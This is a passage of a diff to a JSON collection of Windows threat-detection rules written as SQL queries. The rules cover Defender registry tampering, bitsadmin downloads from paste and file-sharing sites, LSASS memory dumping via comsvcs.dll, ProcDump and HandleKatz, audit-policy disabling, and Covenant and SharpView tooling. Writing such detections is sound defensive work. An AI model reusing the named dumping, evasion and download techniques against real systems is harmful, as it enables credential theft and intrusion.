= '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "status": "test", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Some legitimate apps use this, but limited." 
+ "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "status": 
"test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine 
LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], "falsepositives": [ - "Unknown" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND 
ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.defense_evasion" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", - "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Renamed 
ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "status": "test", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", - "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "status": "experimental", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of 
remote systems", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine 
LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "status": "experimental", - "description": "Detects a Windows program executable started from a suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, 
Nasreddine Bencherchali", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "status": "test", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Exotic software" + "Unlikely, because no one should dump the process memory in that way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program 
Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", - "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND 
